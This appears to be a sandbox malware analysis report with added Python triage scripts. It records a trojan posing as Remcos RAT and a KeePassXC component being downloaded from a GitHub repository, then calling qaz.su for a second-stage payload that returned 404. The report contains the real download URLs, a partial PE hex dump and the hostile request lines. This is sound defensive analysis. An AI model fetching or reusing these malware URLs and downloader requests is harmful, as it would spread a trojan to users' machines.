                            Mar 20, 2025 17:02:22.013801098 CET | 192.168.2.5 | 1.1.1.1 | 0x5f16 | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
                            Mar 20, 2025 17:02:23.121454000 CET | 192.168.2.5 | 1.1.1.1 | 0x1f07 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
                            Mar 20, 2025 17:02:25.490021944 CET | 192.168.2.5 | 1.1.1.1 | 0xf56c | Standard query (0) | qaz.su | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Mar 20, 2025 17:02:22.158931971 CET | 1.1.1.1 | 192.168.2.5 | 0x5f16 | No error (0) | github.com | | 140.82.114.4 | A (IP address) | IN (0x0001) | false
                            Mar 20, 2025 17:02:23.228535891 CET | 1.1.1.1 | 192.168.2.5 | 0x1f07 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
                            Mar 20, 2025 17:02:23.228535891 CET | 1.1.1.1 | 192.168.2.5 | 0x1f07 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
                            Mar 20, 2025 17:02:23.228535891 CET | 1.1.1.1 | 192.168.2.5 | 0x1f07 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
                            Mar 20, 2025 17:02:23.228535891 CET | 1.1.1.1 | 192.168.2.5 | 0x1f07 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
                            Mar 20, 2025 17:02:26.097472906 CET | 1.1.1.1 | 192.168.2.5 | 0xf56c | No error (0) | qaz.su | | 80.87.203.251 | A (IP address) | IN (0x0001) | false
                            • github.com
                            • raw.githubusercontent.com
                            • qaz.su
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.5 | 49722 | 140.82.114.4 | 443 | 8340 | C:\Windows\SysWOW64\wget.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2025-03-20 16:02:22 UTC | 252 | OUT | GET /Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
                            Accept: */*
                            Accept-Encoding: identity
                            Host: github.com
                            Connection: Keep-Alive
                            2025-03-20 16:02:22 UTC | 596 | IN | HTTP/1.1 302 Found
                            Server: GitHub.com
                            Date: Thu, 20 Mar 2025 16:02:22 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 0
                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                            Access-Control-Allow-Origin:
                            Location: https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exe
                            Cache-Control: no-cache
                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                            X-Frame-Options: deny
                            X-Content-Type-Options: nosniff
                            X-XSS-Protection: 0
                            Referrer-Policy: no-referrer-when-downgrade
                            2025-03-20 16:02:23 UTC3368INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75
                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.githu


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            1 | 192.168.2.5 | 49723 | 185.199.110.133 | 443 | 8340 | C:\Windows\SysWOW64\wget.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2025-03-20 16:02:23 UTC | 263 | OUT | GET /Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exe HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
                            Accept: */*
                            Accept-Encoding: identity
                            Host: raw.githubusercontent.com
                            Connection: Keep-Alive
                            2025-03-20 16:02:23 UTC | 894 | IN | HTTP/1.1 200 OK
                            Connection: close
                            Content-Length: 7168
                            Cache-Control: max-age=300
                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                            Content-Type: application/octet-stream
                            ETag: "7fcb5d5ef33cfb9922653946fe94fb99fbbb91d07134a9ccbd4428edf6b3f15f"
                            Strict-Transport-Security: max-age=31536000
                            X-Content-Type-Options: nosniff
                            X-Frame-Options: deny
                            X-XSS-Protection: 1; mode=block
                            X-GitHub-Request-Id: 67BC:23696F:1875CB5:1E56E08:67DC3C0E
                            Accept-Ranges: bytes
                            Date: Thu, 20 Mar 2025 16:02:23 GMT
                            Via: 1.1 varnish
                            X-Served-By: cache-lga21946-LGA
                            X-Cache: MISS
                            X-Cache-Hits: 0
                            X-Timer: S1742486544.579224,VS0,VE68
                            Vary: Authorization,Accept-Encoding,Origin
                            Access-Control-Allow-Origin: *
                            Cross-Origin-Resource-Policy: cross-origin
                            X-Fastly-Request-ID: b54db5ac28fb8654f7b65f0bbd7324176d599c23
                            Expires: Thu, 20 Mar 2025 16:07:23 GMT
                            Source-Age: 0
                            2025-03-20 16:02:23 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 89 8d 16 fb 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 12 00 00 00 08 00 00 00 00 00 00 de 30 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL00 @@ `
                            2025-03-20 16:02:23 UTC1378INData Raw: 4d 03 06 00 dc 01 4d 03 06 00 a3 00 1b 03 0f 00 89 03 00 00 06 00 cb 00 d8 02 06 00 52 01 d8 02 06 00 33 01 d8 02 06 00 c3 01 d8 02 06 00 8f 01 d8 02 06 00 a8 01 d8 02 06 00 e2 00 d8 02 06 00 b7 00 2e 03 06 00 95 00 2e 03 06 00 16 01 d8 02 06 00 fd 00 30 02 06 00 e5 03 a4 02 0a 00 c4 03 1b 03 0e 00 f7 03 9d 03 06 00 4c 04 10 00 0a 00 04 04 ec 03 0e 00 ab 02 9d 03 0a 00 fe 02 7d 02 06 00 5e 04 35 00 06 00 48 00 1f 02 0e 00 36 04 9d 03 0e 00 b2 03 9d 03 0e 00 bd 02 9d 03 06 00 4a 02 a4 02 06 00 61 00 a4 02 06 00 68 04 10 00 0e 00 cc 02 9d 03 06 00 ea 02 35 00 0a 00 ff 02 7d 02 0e 00 93 02 9d 03 0e 00 53 00 9d 03 12 00 1a 02 5b 02 0e 00 9c 02 9d 03 00 00 00 00 2c 00 00 00 00 00 01 00 01 00 00 00 10 00 b0 02 b0 02 41 00 01 00 01 00 01 00 10 00 01 00 20 00 55
                            Data Ascii: MMR3..0L}^5H6Jah5}S[,A U
                            2025-03-20 16:02:23 UTC1378INData Raw: 6d 2e 44 72 61 77 69 6e 67 00 67 65 74 5f 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 43 6f 6e 74 61 69 6e 65 72 43 6f 6e 74 72 6f 6c 00 53 79 73 74 65 6d 00 46 6f 72 6d 00 71 54 72 6f 6a 61 6e 00 4d 61 69 6e 00 4d 65 73 73 61 67 65 42 6f 78 49 63 6f 6e 00 41 70 70 6c 69 63 61 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 44 69 72 65 63 74 6f 72 79 49 6e 66 6f 00 53 6c 65 65 70 00 49 43 6f 6e 74 61 69 6e 65 72 00 43 75 72 72 65 6e 74 55 73 65 72 00 2e 63 74 6f 72 00 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 43 6f 6d
                            Data Ascii: m.Drawingget_ExecutablePathSystem.ComponentModelContainerControlSystemFormqTrojanMainMessageBoxIconApplicationSystem.ReflectionDirectoryInfoSleepIContainerCurrentUser.ctorSystem.DiagnosticsSystem.Runtime.InteropServicesSystem.Runtime.Com
                            2025-03-20 16:02:23 UTC1378INData Raw: 78 63 65 70 74 69 6f 6e 54 68 72 6f 77 73 01 08 01 00 07 01 00 00 00 00 0d 01 00 08 53 79 73 74 65 6d 33 32 00 00 0e 01 00 09 4b 65 65 50 61 73 73 58 43 00 00 05 01 00 00 00 00 13 01 00 0e 4b 65 65 50 61 73 73 58 43 20 54 65 61 6d 00 00 10 01 00 0b 43 6f 6e 73 6f 6c 65 41 70 70 35 00 00 26 01 00 21 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 32 30 32 32 20 4b 65 65 50 61 73 73 58 43 20 54 65 61 6d 00 00 29 01 00 24 32 66 35 65 33 63 35 34 2d 37 31 35 37 2d 34 30 62 66 2d 38 61 35 37 2d 35 34 30 31 63 33 37 62 34 31 36 32 00 00 0c 01 00 07 32 2e 37 2e 31 2e 30 00 00 4d 01 00 1c 2e 4e 45 54 46 72 61 6d 65 77 6f 72 6b 2c 56 65 72 73 69 6f 6e 3d 76 34 2e 37 2e 32 01 00 54 0e 14 46 72 61 6d 65 77 6f 72 6b 44 69 73 70 6c 61 79 4e 61 6d 65 14 2e 4e 45 54 20 46 72
                            Data Ascii: xceptionThrowsSystem32KeePassXCKeePassXC TeamConsoleApp5&!Copyright (C) 2022 KeePassXC Team)$2f5e3c54-7157-40bf-8a57-5401c37b41622.7.1.0M.NETFramework,Version=v4.7.2TFrameworkDisplayName.NET Fr
                            2025-03-20 16:02:23 UTC1378INData Raw: 65 00 50 00 61 00 73 00 73 00 58 00 43 00 00 00 3e 00 0f 00 01 00 43 00 6f 00 6d 00 70 00 61 00 6e 00 79 00 4e 00 61 00 6d 00 65 00 00 00 00 00 4b 00 65 00 65 00 50 00 61 00 73 00 73 00 58 00 43 00 20 00 54 00 65 00 61 00 6d 00 00 00 00 00 3a 00 09 00 01 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e 00 00 00 00 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 00 00 00 00 30 00 08 00 01 00 46 00 69 00 6c 00 65 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 00 00 32 00 2e 00 37 00 2e 00 31 00 2e 00 30 00 00 00 3a 00 0d 00 01 00 49 00 6e 00 74 00 65 00 72 00 6e 00 61 00 6c 00 4e 00 61 00 6d 00 65 00 00 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 2e 00 65 00 78 00 65 00 00 00 00 00 68 00 22 00 01 00 4c
                            Data Ascii: ePassXC>CompanyNameKeePassXC Team:FileDescriptionSystem320FileVersion2.7.1.0:InternalNameSystem32.exeh"L
                            2025-03-20 16:02:23 UTC278INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii:
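The first response chunk in session 1 above is the start of a Windows PE image (the `MZ` / `This program cannot be run in DOS mode` stub, then `PE\0\0`). The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses the DOS header, the COFF file header and the optional header from exactly the bytes printed in the report's Data Raw line for that chunk, and flags the two fields a triage analyst reads first, the link timestamp and the linker version. The capture time is taken from the response's Date header. The report only prints the first bytes of the file, so the data directories and the section table are not available here and the CLR header cannot be located from this excerpt.

```python
"""Parse the PE headers from the bytes captured in HTTP session 1.

Added example, not part of the Joe Sandbox report.  CAPTURED_HEAD_HEX is
copied from the report's "Data Raw" line of the first 1378-byte chunk in
session 1 (the report prints only the start of the chunk).
"""
import struct
from datetime import datetime, timedelta, timezone

CAPTURED_HEAD_HEX = """
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00
b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00
0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68
69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20
6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
50 45 00 00 4c 01 03 00 89 8d 16 fb 00 00 00 00
00 00 00 00 e0 00 02 01 0b 01 30 00 00 12 00 00
00 08 00 00 00 00 00 00 de 30 00 00 00 20 00 00
00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00
04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00
00 80 00 00 00 02 00 00 00 00 00 00 02 00 60 85
00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00
00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
"""
CAPTURED_HEAD = bytes.fromhex(CAPTURED_HEAD_HEX)

# Date header of the HTTP response that delivered the file (session 1).
CAPTURE_TIME = datetime(2025, 3, 20, 16, 2, 23, tzinfo=timezone.utc)

MACHINE_NAMES = {0x14C: "i386", 0x8664: "x86-64", 0x1C0: "ARM", 0xAA64: "ARM64"}
SUBSYSTEM_NAMES = {1: "NATIVE", 2: "WINDOWS_GUI", 3: "WINDOWS_CUI"}
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}


def pe_timestamp(ts: int) -> datetime:
    """TimeDateStamp is seconds since the Unix epoch; timedelta arithmetic
    avoids the platform range limits of datetime.fromtimestamp()."""
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=ts)


def parse_pe_headers(data: bytes) -> dict:
    """Return the DOS, COFF and optional-header fields needed for triage.
    Only the fixed-size part of the optional header is read, so this works
    on a truncated capture like the one in the report."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    (machine, nsections, timestamp, _symtab, _nsyms,
     _opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                      # COFF file header is 20 bytes
    magic, linker_major, linker_minor = struct.unpack_from("<HBB", data, opt)
    (entry_point,) = struct.unpack_from("<I", data, opt + 16)
    if magic == 0x10B:                   # PE32: 32-bit ImageBase after BaseOfData
        (image_base,) = struct.unpack_from("<I", data, opt + 28)
    elif magic == 0x20B:                 # PE32+: 64-bit ImageBase, no BaseOfData
        (image_base,) = struct.unpack_from("<Q", data, opt + 24)
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    return {
        "e_lfanew": e_lfanew,
        "machine": machine, "machine_name": MACHINE_NAMES.get(machine, "unknown"),
        "number_of_sections": nsections,
        "time_date_stamp": timestamp, "link_time": pe_timestamp(timestamp),
        "characteristics": characteristics,
        "magic": magic, "linker_version": (linker_major, linker_minor),
        "entry_point": entry_point, "image_base": image_base,
        "subsystem": subsystem, "subsystem_name": SUBSYSTEM_NAMES.get(subsystem, "other"),
        "dll_characteristics": dll_chars,
        "dll_characteristics_names": sorted(n for b, n in DLL_CHARACTERISTICS.items() if dll_chars & b),
    }


def triage(fields: dict, captured_at: datetime) -> list[str]:
    """Findings a reviewer would note from the header alone."""
    findings = []
    if fields["link_time"] > captured_at:
        findings.append(f"link timestamp {fields['link_time']:%Y-%m-%d} is after capture date "
                        f"{captured_at:%Y-%m-%d}: header timestamp is forged")
    if fields["linker_version"] == (48, 0):
        findings.append("linker version 48.0 is what Roslyn-built .NET assemblies carry: "
                        "expect managed code, not C/C++")
    return findings


if __name__ == "__main__":
    fields = parse_pe_headers(CAPTURED_HEAD)
    for key, value in fields.items():
        print(f"{key:28} {value:#x}" if isinstance(value, int) else f"{key:28} {value}")
    for line in triage(fields, CAPTURE_TIME):
        print("!!", line)
```

On the bytes shown in the report the TimeDateStamp is 0xfb168d89, which decodes to mid-2103, 78 years after the capture; a compile date in the future is a header the author rewrote, not a clock error. The linker version 48.0 together with the `.NETFramework,Version=v4.7.2`, `qTrojan` and KeePassXC version-info strings in the later chunks of the same response says the 7168-byte file is a small .NET assembly posing as a KeePassXC component.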


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            2 | 192.168.2.5 | 49724 | 80.87.203.251 | 443 | 8472 | C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2025-03-20 16:02:26 UTC | 104 | OUT | GET /load/rTE6bi/b733f346-f3cc-4059-b212-d58a8e4d2f06 HTTP/1.1
                            Host: qaz.su
                            Connection: Keep-Alive
                            2025-03-20 16:02:27 UTC | 823 | IN | HTTP/1.1 302 Found
                            Server: ddos-guard
                            Connection: close
                            Set-Cookie: __ddg8_=Bgte63oUhvXtIswC; Domain=.qaz.su; Path=/; Expires=Thu, 20-Mar-2025 16:22:26 GMT
                            Set-Cookie: __ddg10_=1742486546; Domain=.qaz.su; Path=/; Expires=Thu, 20-Mar-2025 16:22:26 GMT
                            Set-Cookie: __ddg9_=161.77.13.2; Domain=.qaz.su; Path=/; Expires=Thu, 20-Mar-2025 16:22:26 GMT
                            Set-Cookie: __ddg1_=Fl4UFRT3yyUv5CtIO4pr; Domain=.qaz.su; HttpOnly; Path=/; Expires=Fri, 20-Mar-2026 16:02:26 GMT
                            Date: Thu, 20 Mar 2025 16:02:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 0
                            X-Powered-By: PHP/7.4.27
                            Set-Cookie: PHPSESSID=7o21doflef16pmr6tluq9euarp; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            Location: https://qaz.su/index.php?a=download&q=file_not_exist


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            3 | 192.168.2.5 | 49725 | 80.87.203.251 | 443 | 8472 | C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2025-03-20 16:02:27 UTC | 69 | OUT | GET /index.php?a=download&q=file_not_exist HTTP/1.1
                            Host: qaz.su
                            2025-03-20 16:02:28 UTC | 789 | IN | HTTP/1.1 404 Not Found
                            Server: ddos-guard
                            Connection: close
                            Set-Cookie: __ddg8_=O4wOpy74RXiJCDQ6; Domain=.qaz.su; Path=/; Expires=Thu, 20-Mar-2025 16:22:27 GMT
                            Set-Cookie: __ddg10_=1742486547; Domain=.qaz.su; Path=/; Expires=Thu, 20-Mar-2025 16:22:27 GMT
                            Set-Cookie: __ddg9_=161.77.13.2; Domain=.qaz.su; Path=/; Expires=Thu, 20-Mar-2025 16:22:27 GMT
                            Set-Cookie: __ddg1_=hKS2vVwlRirc6uGFQrhA; Domain=.qaz.su; HttpOnly; Path=/; Expires=Fri, 20-Mar-2026 16:02:27 GMT
                            Date: Thu, 20 Mar 2025 16:02:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 4365
                            Vary: Accept-Encoding
                            X-Powered-By: PHP/7.4.27
                            Set-Cookie: PHPSESSID=1etumsf5tr0a1ned2fo14bibpt; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            2025-03-20 16:02:28 UTC4365INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 0a 3c 74 69 74 6c 65 3e 50 72 69 76 61 74 65 20 46 69 6c 65 20 53 68 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66
                            Data Ascii: <!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/html"><head><meta charset="UTF-8" /><title>Private File Share</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0"><link rel="shortcut icon" href
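The four HTTP conversations above fall into two groups: the analyst's wget (PID 8340) fetching the sample through GitHub's 302 to raw.githubusercontent.com, and the dropped sample (PID 8472) calling qaz.su, being redirected to `file_not_exist` and receiving a 404. The Python below is an added example, not part of the Joe Sandbox report: it runs the checks a detection engineer would apply to such captures, namely requests without a User-Agent header, a 200 with `application/octet-stream` whose body begins with `MZ`, and redirect chains resolved to the session that followed them. The message texts are copied from the report and trimmed to the headers those checks use (the ddos-guard Set-Cookie and cache headers are left out); the body prefixes are the first bytes of each response body as printed in the Data Raw lines.

```python
"""Triage the four HTTP conversations captured in the report.

Added example, not part of the Joe Sandbox report.  Request and response
heads are copied from the report, cut down to the headers the checks
need.  body_prefix is the start of each response body from the report.
"""

SESSIONS = [
    {"id": 0, "process": r"C:\Windows\SysWOW64\wget.exe",
     "request": """GET /Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Accept: */*
Host: github.com
Connection: Keep-Alive""",
     "response": """HTTP/1.1 302 Found
Server: GitHub.com
Content-Type: text/html; charset=utf-8
Content-Length: 0
Location: https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exe""",
     "body_prefix": b""},
    {"id": 1, "process": r"C:\Windows\SysWOW64\wget.exe",
     "request": """GET /Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Accept: */*
Host: raw.githubusercontent.com
Connection: Keep-Alive""",
     "response": """HTTP/1.1 200 OK
Connection: close
Content-Length: 7168
Content-Type: application/octet-stream
ETag: "7fcb5d5ef33cfb9922653946fe94fb99fbbb91d07134a9ccbd4428edf6b3f15f\"""",
     "body_prefix": b"MZ\x90\x00"},
    {"id": 2, "process": r"C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe",
     "request": """GET /load/rTE6bi/b733f346-f3cc-4059-b212-d58a8e4d2f06 HTTP/1.1
Host: qaz.su
Connection: Keep-Alive""",
     "response": """HTTP/1.1 302 Found
Server: ddos-guard
Content-Type: text/html; charset=UTF-8
Content-Length: 0
X-Powered-By: PHP/7.4.27
Location: https://qaz.su/index.php?a=download&q=file_not_exist""",
     "body_prefix": b""},
    {"id": 3, "process": r"C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe",
     "request": """GET /index.php?a=download&q=file_not_exist HTTP/1.1
Host: qaz.su""",
     "response": """HTTP/1.1 404 Not Found
Server: ddos-guard
Content-Type: text/html; charset=UTF-8
Content-Length: 4365""",
     "body_prefix": b"<!DO"},
]


def parse_http_message(raw: str) -> dict:
    """Split an HTTP/1.1 message head into start line and a lower-cased
    header dict (a repeated header keeps its last value)."""
    lines = raw.strip("\n").split("\n")
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"start_line": lines[0].strip(), "headers": headers}


def request_url(req: dict) -> str:
    """Absolute URL of a request; every session in the report was on TCP/443."""
    _method, target, _version = req["start_line"].split(" ", 2)
    return "https://" + req["headers"]["host"] + target


def triage_session(session: dict) -> dict:
    req = parse_http_message(session["request"])
    resp = parse_http_message(session["response"])
    status = int(resp["start_line"].split()[1])
    findings = []
    if "user-agent" not in req["headers"]:      # wget set one, the sample did not
        findings.append("no User-Agent header")
    ctype = resp["headers"].get("content-type", "")
    if status == 200 and ctype.startswith("application/octet-stream") \
            and session["body_prefix"].startswith(b"MZ"):
        findings.append(f"PE image delivered ({resp['headers'].get('content-length', '?')} bytes)")
    return {"id": session["id"], "process": session["process"], "url": request_url(req),
            "status": status, "location": resp["headers"].get("location"), "findings": findings}


def redirect_chain(results: list) -> list:
    """Pair each 3xx Location with the session that fetched it, as
    (from_url, to_url, final_status) triples in session order."""
    by_url = {r["url"]: r for r in results}
    return [(r["url"], r["location"], by_url[r["location"]]["status"])
            for r in results if 300 <= r["status"] < 400 and r["location"] in by_url]


def triage_all(sessions=SESSIONS) -> list:
    return [triage_session(s) for s in sessions]


if __name__ == "__main__":
    results = triage_all()
    for r in results:
        print(r["id"], r["process"].rsplit("\\", 1)[-1], r["status"], r["url"], r["findings"])
    for src, dst, final in redirect_chain(results):
        print(f"{src} -> {dst} [{final}]")
```

The two chains come out as github.com -> raw.githubusercontent.com ending in a 200 that carries a 7168-byte PE, and qaz.su/load/... -> qaz.su/index.php?a=download&q=file_not_exist ending in 404: the second-stage payload the sample tried to pull was already gone from the file share at analysis time, which is why nothing further executes in this run. Both sample-originated requests are the bare `GET` + `Host` that a .NET `WebClient` emits without an explicit User-Agent, a cheap proxy-log indicator for this family of downloaders.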


                            Target ID:0
                            Start time:12:02:20
                            Start date:20/03/2025
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
